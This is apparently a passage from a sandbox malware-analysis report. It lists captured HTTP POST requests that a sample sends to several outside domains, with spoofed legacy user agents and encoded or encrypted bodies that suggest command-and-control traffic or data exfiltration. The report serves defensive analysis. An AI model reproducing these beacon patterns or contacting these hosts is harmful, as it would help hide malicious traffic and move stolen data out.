AM/TBE7dQYwxaNOQ2USSNrFLY/VOuQV0YqrX4mOQAE3Qe8Lw7PKPN7UuQXtjUmRXNroGoS9jLa5xg6aeN83JjRY61yhQp5Pj4hIxslz02/ZINxpY2g2JjUUCYDLKgDvqx9X/5RNiURkYpOPh4vfoEzAEjSmIgeBOq7tmVfrAoW4B9mTsdBkl13XWsl0MvHVtk28XCdvwUkYNvjT3m2qrm+o3R+xw6PVbHuiQBigcuriM1wbBGBFHiaCe0RBRApJE7cGWTqlRmsOfUrNeQIxo8KQv03qM0jgzGumHXDKvmfkGhNi0TVW0NK2wehREathVej/3OS/LdtyZy8ONlxK6Wlz0xlVt44UtOffTvtipzPYV6o2VAmEWMIbXA5jeCn4M4rD6sNI6TgYPZNrFi2fcMtdUSRimz3lY4Fg+O4BcKNDcTQGOuO79WY3xx6BBq/dJDXAQ7aBmFChVNnKpiPxXrDs+d4yLT1zkTyIUlGSCaXpjfemRnZQ2KA06TiuThKlvPOjbqXvKICqHh/7CERIshk2M6FOjv+JRLyd8PMa6TT2LyQX8DIYkFjSxPn7CKrKodEss1UlKNw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 47 4a 6d 42 53 74 4e 77 54 49 7a 50 70 49 4b 78 6d 73 44 66 31 58 78 36 65 67 47 35 74 39 33 66 74 7a 76 4f 32 75 50 71 46 33 73 69 37 74 4b 6c 61 44 58 68 47 64 54 4e 55 5a 35 78 53 4a 72 32 67 6b 34 4a 4d 42 4b 4d 57 32 42 62 4d 4e 67 61 53 35 4d 54 69 31 57 6a 45 4c 76 45 72 4b 79 46 37 5a 4b 63 33 73 50 75 70 36 32 65 75 49 6a 2b 32 69 36 36 79 2b 61 43 48 7a 55 31 6e 69 48 76 6d 6a 4f 75 49 30 45 2f 6b 43 30 4c 34 73 70 39 56 6e 70 30 31 79 39 43 38 6f 43 32 43 6a 33 6e 4a 6b 4a 2f 4b 4d 6b 2f 6c 57 2f 66 35 44 58 58 48 59 69 2f 68 38 4e 4a 6f 6d 73 50 70 35 4a 33 6d 6d 44 6d 55 6e 6e 37 6c 55 2b 50 6c 63 6b 56 56 64 5a 62 32 63 6a 42 77 69 49 64 39 38 73 46 32 67 36 7a 73 4d 2f 62 74 41 64 43 4b 78 38 43 36 5a 39 64 57 4f 34 54 54 49 70 4d 66 36 39 31 55 36 5a 56 71 6b 2f 6d 73 78 6e 42 43 63 47 4b 58 4e 6c 49 50 63 51 31 57 34 79 47 34 68 76 72 50 48 72 62 61 70 53 44 4e 6d 2b 31 2f 39 67 77 36 37 2b 2f 63 2b 6e 32 56 72 4a 58 42 53 42 79 51 62 59 4f 38 62 68 41 39 35 72 69 4f 50 61 4c 56 71 5a 35 73 69 7a 57 5a 6f 35 4b 54 37 6c 61 76 34 69 57 58 34 2f 68 37 70 36 39 56 78 33 6d 38 53 36 2f 55 62 63 56 4c 4d 4b 72 47 41 4f 6f 6c 63 5a 4d 57 64 45 2f 30 32 42 46 71 45 38 6d 37 36 53 64 68 4c 41 76 70 76 31 6a 5a 4b 4a 6b 4d 70 70 48 68 4a 68 6e 30 55 46 44 33 64 76 66 67 41 50 68 4d 4b 30 79 6b 2b 41 79 63 4c 4e 62 75 4b 46 4b 51 6a 71 4e 39 4f 46 73 36 66 4f 64 71 76 6a 54 51 43 4b 67 76 72 70 6e 4d 53 78 49 68 4f 74 49 33 48 75 62 5a 47 6c 70 73 4e 42 64 68 6e 37 56 41 44 55 75 48 35 64 53 59 50 6c 48 5a 63 35 50 7a 39 6e 65 54 53 4d 55 31 33 51 2f 4f 77 4b 44 69 50 6c 67 7a 38 63 72 6a 4b 75 78 4a 51 70 55 4e 37 47 35 46 63 66 76 34 4f 63 76 Data Ascii: GJmBStNwTIzPpIKxmsDf1Xx6egG5t93ftzvO2uPqF3si7tKlaDXhGdTNUZ5xSJr2gk4JMBKMW2BbMNgaS5MTi1WjELvErKyF7ZKc3sPup62euIj+2i66y+aCHzU1niHvmjOuI0E/kC0L4sp9Vnp01y9C8oC2Cj3nJkJ/KMk/lW/f5DXXHYi/h8NJomsPp5J3mmDmUnn7lU+PlckVVdZb2cjBwiId98sF2g6zsM/btAdCKx8C6Z9dWO4TTIpMf691U6ZVqk/msxnBCcGKXNlIPcQ1W4yG4hvrPHrbapSDNm+1/9gw67+/c+n2VrJXBSByQbYO8bhA95riOPaLVqZ5sizWZo5KT7lav4iWX4/h7p69Vx3m8S6/UbcVLMKrGAOolcZMWdE/02BFqE8m76SdhLAvpv1jZKJkMppHhJhn0UFD3dvfgAPhMK0yk+AycLNbuKFKQjqN9OFs6fOdqvjTQCKgvrpnMSxIhOtI3HubZGlpsNBdhn7VADUuH5dSYPlHZc5Pz9neTSMU13Q/OwKDiPlgz8crjKuxJQpUN7G5Fcfv4Ocv
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 47 4a 6d 42 53 74 4e 77 54 49 7a 50 70 49 4b 78 6d 73 44 66 31 58 78 36 65 67 47 35 74 39 33 66 74 7a 76 4f 32 75 50 71 46 33 73 69 37 74 4b 6c 61 44 58 68 47 64 54 4e 55 5a 35 78 53 4a 72 32 67 6b 34 4a 4d 42 4b 4d 57 32 42 62 4d 4e 67 61 53 35 4d 54 69 31 57 6a 45 4c 76 45 72 4b 79 46 37 5a 4b 63 33 73 50 75 70 36 32 65 75 49 6a 2b 32 69 36 36 79 2b 61 43 48 7a 55 31 6e 69 48 76 6d 6a 4f 75 49 30 45 2f 6b 43 30 4c 34 73 70 39 56 6e 70 30 31 79 39 43 38 6f 43 32 43 6a 33 6e 4a 6b 4a 2f 4b 4d 6b 2f 6c 57 2f 66 35 44 58 58 48 59 69 2f 68 38 4e 4a 6f 6d 73 50 70 35 4a 33 6d 6d 44 6d 55 6e 6e 37 6c 55 2b 50 6c 63 6b 56 56 64 5a 62 32 63 6a 42 77 69 49 64 39 38 73 46 32 67 36 7a 73 4d 2f 62 74 41 64 43 4b 78 38 43 36 5a 39 64 57 4f 34 54 54 49 70 4d 66 36 39 31 55 36 5a 56 71 6b 2f 6d 73 78 6e 42 43 63 47 4b 58 4e 6c 49 50 63 51 31 57 34 79 47 34 68 76 72 50 48 72 62 61 70 53 44 4e 6d 2b 31 2f 39 67 77 36 37 2b 2f 63 2b 6e 32 56 72 4a 58 42 53 42 79 51 62 59 4f 38 62 68 41 39 35 72 69 4f 50 61 4c 56 71 5a 35 73 69 7a 57 5a 6f 35 4b 54 37 6c 61 76 34 69 57 58 34 2f 68 37 70 36 39 56 78 33 6d 38 53 36 2f 55 62 63 56 4c 4d 4b 72 47 41 4f 6f 6c 63 5a 4d 57 64 45 2f 30 32 42 46 71 45 38 6d 37 36 53 64 68 4c 41 76 70 76 31 6a 5a 4b 4a 6b 4d 70 70 48 68 4a 68 6e 30 55 46 44 33 64 76 66 67 41 50 68 4d 4b 30 79 6b 2b 41 79 63 4c 4e 62 75 4b 46 4b 51 6a 71 4e 39 4f 46 73 36 66 4f 64 71 76 6a 54 51 43 4b 67 76 72 70 6e 4d 53 78 49 68 4f 74 49 33 48 75 62 5a 47 6c 70 73 4e 42 64 68 6e 37 56 41 44 55 75 48 35 64 53 59 50 6c 48 5a 63 35 50 7a 39 6e 65 54 53 4d 55 31 33 51 2f 4f 77 4b 44 69 50 6c 67 7a 38 63 72 6a 4b 75 78 4a 51 70 55 4e 37 47 35 46 63 66 76 34 4f 63 76 Data Ascii: GJmBStNwTIzPpIKxmsDf1Xx6egG5t93ftzvO2uPqF3si7tKlaDXhGdTNUZ5xSJr2gk4JMBKMW2BbMNgaS5MTi1WjELvErKyF7ZKc3sPup62euIj+2i66y+aCHzU1niHvmjOuI0E/kC0L4sp9Vnp01y9C8oC2Cj3nJkJ/KMk/lW/f5DXXHYi/h8NJomsPp5J3mmDmUnn7lU+PlckVVdZb2cjBwiId98sF2g6zsM/btAdCKx8C6Z9dWO4TTIpMf691U6ZVqk/msxnBCcGKXNlIPcQ1W4yG4hvrPHrbapSDNm+1/9gw67+/c+n2VrJXBSByQbYO8bhA95riOPaLVqZ5sizWZo5KT7lav4iWX4/h7p69Vx3m8S6/UbcVLMKrGAOolcZMWdE/02BFqE8m76SdhLAvpv1jZKJkMppHhJhn0UFD3dvfgAPhMK0yk+AycLNbuKFKQjqN9OFs6fOdqvjTQCKgvrpnMSxIhOtI3HubZGlpsNBdhn7VADUuH5dSYPlHZc5Pz9neTSMU13Q/OwKDiPlgz8crjKuxJQpUN7G5Fcfv4Ocv
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 31 56 6a 52 53 6d 68 7a 54 49 78 36 63 30 78 42 4b 7a 39 30 46 39 75 36 41 66 5a 77 57 6e 5a 33 48 43 32 52 55 6d 49 4e 32 76 68 32 54 4d 71 32 55 31 71 34 63 56 50 77 47 35 67 45 4b 66 48 68 54 31 33 32 4e 43 42 2f 50 66 6e 32 37 79 78 58 42 58 57 74 55 57 61 5a 35 6d 6a 57 32 50 2b 62 50 6c 75 41 61 2b 69 70 32 49 56 44 59 4c 62 32 63 64 52 63 76 4d 51 62 4f 46 61 35 70 31 46 4d 4a 55 73 73 48 59 6b 69 4c 77 52 30 45 43 49 75 72 44 4e 75 35 55 74 76 35 62 53 4b 2b 39 73 50 6e 6c 4f 44 52 71 55 78 50 62 49 62 7a 2f 48 54 36 32 58 6c 53 51 30 55 39 59 6e 4e 34 62 38 76 53 51 77 48 6f 4d 4c 71 6c 39 35 54 4d 73 6c 62 72 34 6f 61 2f 6c 53 6b 75 6c 58 6c 6a 74 2b 4a 6e 43 64 71 6b 4e 50 47 73 41 6c 4a 64 44 4a 37 2b 75 4f 30 69 6b 32 37 64 48 68 2b 62 55 38 5a 55 7a 58 74 42 75 36 74 50 61 6d 32 4d 74 64 41 61 54 67 32 43 4e 6d 79 4d 53 64 58 43 72 2b 78 62 70 66 52 50 30 39 70 55 35 59 36 77 37 7a 6b 30 76 6d 6e 69 71 6d 30 43 47 56 33 4a 77 48 64 43 50 4d 42 45 5a 48 38 77 6f 56 6b 6a 6d 57 30 6c 72 39 76 74 36 65 68 32 43 4e 31 65 64 41 65 43 6b 42 62 32 62 2f 59 74 4b 56 50 38 44 44 6b 6a 73 6a 50 58 76 31 78 32 67 44 74 6c 53 62 73 72 64 34 4a 43 6b 43 6c 6f 50 35 61 4d 35 76 41 51 68 4f 75 65 69 65 4d 72 57 7a 33 72 59 62 33 56 4b 53 56 37 54 37 5a 74 37 59 2f 4a 54 6f 6b 5a 4b 51 55 46 37 57 4e 4e 62 58 6c 72 33 44 4a 79 6a 49 4f 71 63 6e 6d 4f 6c 6a 7a 70 78 4b 6b 76 6b 4a 4f 36 7a 6c 30 6d 56 57 46 53 79 31 67 30 6a 39 68 36 38 2f 4b 53 74 48 57 6c 47 67 77 38 52 50 30 79 5a 66 46 37 61 31 67 6d 37 74 62 6f 38 39 2b 35 59 48 5a 45 73 4c 67 6e 42 59 2b 64 33 48 6f 72 59 67 3d Data Ascii: 1VjRSmhzTIx6c0xBKz90F9u6AfZwWnZ3HC2RUmIN2vh2TMq2U1q4cVPwG5gEKfHhT132NCB/Pfn27yxXBXWtUWaZ5mjW2P+bPluAa+ip2IVDYLb2cdRcvMQbOFa5p1FMJUssHYkiLwR0ECIurDNu5Utv5bSK+9sPnlODRqUxPbIbz/HT62XlSQ0U9YnN4b8vSQwHoMLql95TMslbr4oa/lSkulXljt+JnCdqkNPGsAlJdDJ7+uO0ik27dHh+bU8ZUzXtBu6tPam2MtdAaTg2CNmyMSdXCr+xbpfRP09pU5Y6w7zk0vmniqm0CGV3JwHdCPMBEZH8woVkjmW0lr9vt6eh2CN1edAeCkBb2b/YtKVP8DDkjsjPXv1x2gDtlSbsrd4JCkCloP5aM5vAQhOueieMrWz3rYb3VKSV7T7Zt7Y/JTokZKQUF7WNNbXlr3DJyjIOqcnmOljzpxKkvkJO6zl0mVWFSy1g0j9h68/KStHWlGgw8RP0yZfF7a1gm7tbo89+5YHZEsLgnBY+d3HorYg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 63 33 63 34 46 4f 67 36 37 34 74 61 72 37 6a 70 71 32 47 31 61 56 74 75 4b 56 7a 77 4a 33 38 41 6e 4b 78 4a 79 31 36 6e 47 6a 70 48 6a 38 75 54 59 6d 46 61 31 51 58 6f 6a 36 69 59 49 62 49 50 31 59 48 6d 6d 59 37 75 65 31 67 73 67 48 63 61 67 37 70 5a 31 30 51 36 76 79 7a 5a 7a 58 4a 70 6d 51 4d 63 4d 76 72 67 7a 74 66 4c 50 69 4f 76 4d 56 6b 7a 49 6b 74 36 44 75 68 58 57 6f 47 54 2b 45 6b 6b 41 67 52 57 4c 31 76 68 65 63 35 48 31 75 73 54 44 4f 58 78 5a 76 55 47 39 50 67 48 5a 79 34 76 56 4b 31 79 65 57 63 6b 74 66 76 6b 78 2f 6c 38 55 74 70 36 49 57 78 58 74 67 77 34 59 2b 42 61 59 53 70 4e 71 72 6f 68 32 43 32 77 54 71 45 54 67 53 61 4a 55 54 33 7a 63 6c 78 62 45 47 42 36 71 44 65 46 61 4d 34 77 37 57 39 48 39 79 42 62 33 6a 47 43 76 45 49 50 54 77 70 73 39 75 39 4e 53 30 5a 76 7a 59 4b 48 50 76 75 76 30 42 4a 68 31 65 6e 75 4c 69 6f 39 69 6a 7a 64 4d 4c 72 4b 34 49 2f 75 65 50 65 77 56 64 74 7a 4c 61 48 72 4c 47 2b 39 63 4a 46 4a 6c 37 46 58 42 56 36 78 33 6d 68 36 31 2b 6d 6f 48 73 57 69 52 34 38 37 46 66 73 4d 2b 7a 46 65 36 4f 75 31 75 55 43 43 32 66 74 63 38 6d 49 6f 4b 30 6b 2b 67 58 65 32 6b 41 55 55 54 41 33 68 41 6e 6e 6e 6d 55 70 35 59 67 72 45 35 41 4d 64 4d 79 65 36 65 49 77 39 55 4b 30 6c 75 2f 6f 72 31 38 32 43 31 49 45 4b 69 50 4b 66 4b 51 69 55 6f 6e 56 4c 52 57 54 4c 68 43 51 31 37 52 49 70 2b 66 68 6b 43 44 4d 50 57 4c 42 48 64 36 31 76 69 30 6e 36 4f 45 38 71 69 49 41 75 43 6e 62 31 4d 59 49 34 37 6c 6a 4e 49 52 33 61 39 6b 77 77 56 61 41 45 34 39 52 78 68 70 45 31 30 2f 6e 67 6b 50 59 39 72 66 43 2b 55 45 4e 4b 59 42 77 39 49 67 6e 70 71 6f 2b 36 71 65 62 43 6d 2b 42 68 65 4a 41 55 6e 4f 76 50 71 65 4e 53 44 61 53 34 59 2f 4e 41 55 74 66 71 35 30 4f 64 52 6c 38 50 79 31 69 66 6d 68 50 48 38 67 3d 3d Data Ascii: c3c4FOg674tar7jpq2G1aVtuKVzwJ38AnKxJy16nGjpHj8uTYmFa1QXoj6iYIbIP1YHmmY7ue1gsgHcag7pZ10Q6vyzZzXJpmQMcMvrgztfLPiOvMVkzIkt6DuhXWoGT+EkkAgRWL1vhec5H1usTDOXxZvUG9PgHZy4vVK1yeWcktfvkx/l8Utp6IWxXtgw4Y+BaYSpNqroh2C2wTqETgSaJUT3zclxbEGB6qDeFaM4w7W9H9yBb3jGCvEIPTwps9u9NS0ZvzYKHPvuv0BJh1enuLio9ijzdMLrK4I/uePewVdtzLaHrLG+9cJFJl7FXBV6x3mh61+moHsWiR487FfsM+zFe6Ou1uUCC2ftc8mIoK0k+gXe2kAUUTA3hAnnnmUp5YgrE5AMdMye6eIw9UK0lu/or182C1IEKiPKfKQiUonVLRWTLhCQ17RIp+fhkCDMPWLBHd61vi0n6OE8qiIAuCnb1MYI47ljNIR3a9kwwVaAE49RxhpE10/ngkPY9rfC+UENKYBw9Ignpqo+6qebCm+BheJAUnOvPqeNSDaS4Y/NAUtfq50OdRl8Py1ifmhPH8g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 63 33 63 34 46 4f 67 36 37 34 74 61 72 37 6a 70 71 32 47 31 61 56 74 75 4b 56 7a 77 4a 33 38 41 6e 4b 78 4a 79 31 36 6e 47 6a 70 48 6a 38 75 54 59 6d 46 61 31 51 58 6f 6a 36 69 59 49 62 49 50 31 59 48 6d 6d 59 37 75 65 31 67 73 67 48 63 61 67 37 70 5a 31 30 51 36 76 79 7a 5a 7a 58 4a 70 6d 51 4d 63 4d 76 72 67 7a 74 66 4c 50 69 4f 76 4d 56 6b 7a 49 6b 74 36 44 75 68 58 57 6f 47 54 2b 45 6b 6b 41 67 52 57 4c 31 76 68 65 63 35 48 31 75 73 54 44 4f 58 78 5a 76 55 47 39 50 67 48 5a 79 34 76 56 4b 31 79 65 57 63 6b 74 66 76 6b 78 2f 6c 38 55 74 70 36 49 57 78 58 74 67 77 34 59 2b 42 61 59 53 70 4e 71 72 6f 68 32 43 32 77 54 71 45 54 67 53 61 4a 55 54 33 7a 63 6c 78 62 45 47 42 36 71 44 65 46 61 4d 34 77 37 57 39 48 39 79 42 62 33 6a 47 43 76 45 49 50 54 77 70 73 39 75 39 4e 53 30 5a 76 7a 59 4b 48 50 76 75 76 30 42 4a 68 31 65 6e 75 4c 69 6f 39 69 6a 7a 64 4d 4c 72 4b 34 49 2f 75 65 50 65 77 56 64 74 7a 4c 61 48 72 4c 47 2b 39 63 4a 46 4a 6c 37 46 58 42 56 36 78 33 6d 68 36 31 2b 6d 6f 48 73 57 69 52 34 38 37 46 66 73 4d 2b 7a 46 65 36 4f 75 31 75 55 43 43 32 66 74 63 38 6d 49 6f 4b 30 6b 2b 67 58 65 32 6b 41 55 55 54 41 33 68 41 6e 6e 6e 6d 55 70 35 59 67 72 45 35 41 4d 64 4d 79 65 36 65 49 77 39 55 4b 30 6c 75 2f 6f 72 31 38 32 43 31 49 45 4b 69 50 4b 66 4b 51 69 55 6f 6e 56 4c 52 57 54 4c 68 43 51 31 37 52 49 70 2b 66 68 6b 43 44 4d 50 57 4c 42 48 64 36 31 76 69 30 6e 36 4f 45 38 71 69 49 41 75 43 6e 62 31 4d 59 49 34 37 6c 6a 4e 49 52 33 61 39 6b 77 77 56 61 41 45 34 39 52 78 68 70 45 31 30 2f 6e 67 6b 50 59 39 72 66 43 2b 55 45 4e 4b 59 42 77 39 49 67 6e 70 71 6f 2b 36 71 65 62 43 6d 2b 42 68 65 4a 41 55 6e 4f 76 50 71 65 4e 53 44 61 53 34 59 2f 4e 41 55 74 66 71 35 30 4f 64 52 6c 38 50 79 31 69 66 6d 68 50 48 38 67 3d 3d Data Ascii: c3c4FOg674tar7jpq2G1aVtuKVzwJ38AnKxJy16nGjpHj8uTYmFa1QXoj6iYIbIP1YHmmY7ue1gsgHcag7pZ10Q6vyzZzXJpmQMcMvrgztfLPiOvMVkzIkt6DuhXWoGT+EkkAgRWL1vhec5H1usTDOXxZvUG9PgHZy4vVK1yeWcktfvkx/l8Utp6IWxXtgw4Y+BaYSpNqroh2C2wTqETgSaJUT3zclxbEGB6qDeFaM4w7W9H9yBb3jGCvEIPTwps9u9NS0ZvzYKHPvuv0BJh1enuLio9ijzdMLrK4I/uePewVdtzLaHrLG+9cJFJl7FXBV6x3mh61+moHsWiR487FfsM+zFe6Ou1uUCC2ftc8mIoK0k+gXe2kAUUTA3hAnnnmUp5YgrE5AMdMye6eIw9UK0lu/or182C1IEKiPKfKQiUonVLRWTLhCQ17RIp+fhkCDMPWLBHd61vi0n6OE8qiIAuCnb1MYI47ljNIR3a9kwwVaAE49RxhpE10/ngkPY9rfC+UENKYBw9Ignpqo+6qebCm+BheJAUnOvPqeNSDaS4Y/NAUtfq50OdRl8Py1ifmhPH8g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 53 4b 31 4c 53 32 4a 33 54 49 79 4e 6e 78 46 52 31 51 39 30 66 4f 55 79 49 6b 7a 79 4c 75 70 2f 74 76 74 55 41 58 63 65 59 2f 4a 48 6c 46 61 4a 6b 46 2f 4e 2f 67 34 2f 70 46 4e 2b 33 45 4c 51 64 67 6d 51 62 49 53 33 6e 4e 46 56 69 42 30 66 51 6a 36 64 63 67 4e 61 2b 65 66 62 52 6d 64 75 72 61 56 58 69 7a 67 50 33 49 36 4e 42 6f 74 32 6b 55 73 70 67 63 4b 69 56 4d 48 77 77 2b 2b 73 50 39 31 74 49 74 56 67 61 63 4c 71 44 6b 44 75 46 59 35 52 52 57 4e 2f 44 79 65 32 79 59 44 5a 59 74 76 69 36 49 5a 6e 52 61 43 55 73 54 6d 49 42 39 6e 4b 70 7a 71 52 31 44 35 59 66 6d 4e 45 49 41 63 6e 2b 48 45 58 67 43 66 6b 4d 6a 7a 42 47 2f 76 41 30 30 6a 4e 50 7a 41 50 6a 31 38 44 57 72 74 77 63 73 58 4c 66 67 62 44 6d 70 77 70 61 2f 67 54 4c 48 39 6d 4c 4f 39 2b 66 71 49 50 68 47 6b 34 58 47 78 53 68 79 30 38 67 57 6c 62 4e 58 2b 6c 35 30 36 46 51 4c 67 51 42 56 54 79 6a 63 6e 53 32 47 35 38 32 5a 6c 31 2b 4e 6d 65 49 4f 35 43 37 6b 31 57 76 45 6f 68 44 6f 5a 2b 53 39 46 44 77 69 2f 39 42 51 6f 68 65 36 75 71 78 38 49 45 41 58 6e 67 78 63 68 36 49 62 73 6e 35 54 67 37 55 30 6b 32 61 6b 70 43 64 70 6c 73 6e 61 4a 55 47 61 37 47 69 4a 6a 38 33 7a 79 65 6a 49 57 6e 4f 75 6a 79 4b 72 6b 64 4c 69 78 4d 79 58 47 33 42 6e 6f 34 56 76 75 6b 47 32 30 41 42 75 32 57 75 57 4e 6a 30 73 35 6d 58 76 76 74 4e 79 4f 61 6b 2f 31 6b 41 36 36 7a 59 42 76 74 4b 49 4d 62 31 4f 59 7a 2b 51 78 63 4b 75 6c 50 57 4d 6c 39 69 61 64 70 6a 64 6e 6c 4e 70 72 6e 47 4f 4c 63 62 63 76 53 79 49 46 72 41 79 75 43 72 48 52 77 66 44 4d 55 53 52 54 6d 68 42 49 6a 37 41 76 33 2f 4a 32 68 56 4b 6a 77 52 62 59 6f 62 46 46 7a 46 55 77 46 52 4e 41 4f 50 79 45 4d 67 46 67 37 58 53 74 77 49 6e 51 66 46 38 4f 61 76 30 57 68 4f 55 32 72 71 52 4f 51 30 4f 64 4a Data Ascii: SK1LS2J3TIyNnxFR1Q90fOUyIkzyLup/tvtUAXceY/JHlFaJkF/N/g4/pFN+3ELQdgmQbIS3nNFViB0fQj6dcgNa+efbRmduraVXizgP3I6NBot2kUspgcKiVMHww++sP91tItVgacLqDkDuFY5RRWN/Dye2yYDZYtvi6IZnRaCUsTmIB9nKpzqR1D5YfmNEIAcn+HEXgCfkMjzBG/vA00jNPzAPj18DWrtwcsXLfgbDmpwpa/gTLH9mLO9+fqIPhGk4XGxShy08gWlbNX+l506FQLgQBVTyjcnS2G582Zl1+NmeIO5C7k1WvEohDoZ+S9FDwi/9BQohe6uqx8IEAXngxch6Ibsn5Tg7U0k2akpCdplsnaJUGa7GiJj83zyejIWnOujyKrkdLixMyXG3Bno4VvukG20ABu2WuWNj0s5mXvvtNyOak/1kA66zYBvtKIMb1OYz+QxcKulPWMl9iadpjdnlNprnGOLcbcvSyIFrAyuCrHRwfDMUSRTmhBIj7Av3/J2hVKjwRbYobFFzFUwFRNAOPyEMgFg7XStwInQfF8Oav0WhOU2rqROQ0OdJ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=qevfdbkhvymvucsymoyelskgtggmizsw; _mcnc=1Data Raw: 7a 4d 6a 47 42 53 2f 6c 51 59 77 6f 73 31 46 66 54 6c 43 76 2f 6a 68 62 64 65 68 46 57 59 4b 43 30 79 39 51 6a 45 34 64 6f 64 6d 58 70 6a 54 6e 44 52 35 5a 31 4a 4b 36 38 58 38 2b 6f 65 6b 74 4b 6d 43 61 71 2b 70 44 46 57 4e 4c 49 50 45 30 43 41 75 47 37 44 46 72 6a 37 6b 68 68 73 54 64 2b 73 51 72 4f 50 45 52 72 53 6b 69 53 54 43 58 67 2b 6b 38 71 35 72 62 78 6b 39 39 50 72 2b 56 37 4d 69 63 61 42 48 75 41 67 6f 72 63 6c 51 58 6e 51 4f 31 71 4b 76 6f 37 2b 4c 58 48 4e 75 52 41 46 68 47 53 69 48 34 33 39 6a 38 46 54 78 74 4d 50 45 63 46 6b 62 72 6f 70 71 70 36 46 70 56 54 43 53 53 57 7a 67 7a 43 6d 37 70 66 43 43 58 45 73 4d 36 58 67 38 6a 4f 41 75 69 62 4d 2f 4b 4a 30 49 37 73 38 77 5a 41 41 41 4c 55 30 65 46 70 73 36 44 43 61 6c 70 45 47 65 32 4a 4f 76 35 32 55 68 6e 37 64 31 6f 4d 57 46 44 44 39 6a 33 6c 43 65 70 72 2b 47 55 76 75 33 75 63 34 4b 69 66 69 70 51 4d 2f 41 4d 52 41 74 70 4b 6d 4d 6a 74 67 33 78 37 4d 38 52 33 52 48 69 70 30 75 47 63 58 53 4f 79 38 6e 57 79 4d 67 46 52 2f 36 36 51 64 49 68 51 59 78 6b 30 69 50 63 46 68 39 43 6c 4a 79 69 2f 6a 38 74 37 34 38 72 6b 58 32 6b 4a 35 52 5a 31 52 33 4b 45 44 2f 4e 50 73 4c 2b 48 35 78 57 2b 67 34 6b 76 55 7a 4a 35 39 79 69 75 6a 4b 4a 71 57 48 63 30 43 61 45 42 53 71 41 33 35 35 6b 6d 35 70 4b 4f 33 6c 43 6f 77 56 56 59 33 43 44 61 61 7a 6a 74 6e 62 6f 4b 69 2b 63 64 66 67 30 37 75 65 76 5a 44 7a 6a 76 50 55 65 54 57 54 74 36 5a 6c 49 6b 75 37 53 35 49 37 6e 32 47 57 74 67 52 71 58 4b 31 6f 64 59 76 66 56 70 42 6c 72 6f 31 37 4a 76 46 54 59 51 77 56 62 62 30 38 44 6a 4e 64 2f 77 51 62 77 73 37 35 48 45 35 77 6b 6d 64 38 52 37 78 56 72 6f 52 72 79 77 75 39 4e 70 34 5a 41 64 54 39 64 61 63 76 4f 4a 56 61 69 37 2f 66 47 72 77 41 43 57 38 46 33 33 34 7a 5a Data Ascii: zMjGBS/lQYwos1FfTlCv/jhbdehFWYKC0y9QjE4dodmXpjTnDR5Z1JK68X8+oektKmCaq+pDFWNLIPE0CAuG7DFrj7khhsTd+sQrOPERrSkiSTCXg+k8q5rbxk99Pr+V7MicaBHuAgorclQXnQO1qKvo7+LXHNuRAFhGSiH439j8FTxtMPEcFkbropqp6FpVTCSSWzgzCm7pfCCXEsM6Xg8jOAuibM/KJ0I7s8wZAAALU0eFps6DCalpEGe2JOv52Uhn7d1oMWFDD9j3lCepr+GUvu3uc4KifipQM/AMRAtpKmMjtg3x7M8R3RHip0uGcXSOy8nWyMgFR/66QdIhQYxk0iPcFh9ClJyi/j8t748rkX2kJ5RZ1R3KED/NPsL+H5xW+g4kvUzJ59yiujKJqWHc0CaEBSqA355km5pKO3lCowVVY3CDaazjtnboKi+cdfg07uevZDzjvPUeTWTt6ZlIku7S5I7n2GWtgRqXK1odYvfVpBlro17JvFTYQwVbb08DjNd/wQbws75HE5wkmd8R7xVroRrywu9Np4ZAdT9dacvOJVai7/fGrwACW8F334zZ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 53 4b 31 4c 53 32 4a 33 54 49 79 4e 6e 78 46 52 31 51 39 30 66 4f 55 79 49 6b 7a 79 4c 75 70 2f 74 76 74 55 41 58 63 65 59 2f 4a 48 6c 46 61 4a 6b 46 2f 4e 2f 67 34 2f 70 46 4e 2b 33 45 4c 51 64 67 6d 51 62 49 53 33 6e 4e 46 56 69 42 30 66 51 6a 36 64 63 67 4e 61 2b 65 66 62 52 6d 64 75 72 61 56 58 69 7a 67 50 33 49 36 4e 42 6f 74 32 6b 55 73 70 67 63 4b 69 56 4d 48 77 77 2b 2b 73 50 39 31 74 49 74 56 67 61 63 4c 71 44 6b 44 75 46 59 35 52 52 57 4e 2f 44 79 65 32 79 59 44 5a 59 74 76 69 36 49 5a 6e 52 61 43 55 73 54 6d 49 42 39 6e 4b 70 7a 71 52 31 44 35 59 66 6d 4e 45 49 41 63 6e 2b 48 45 58 67 43 66 6b 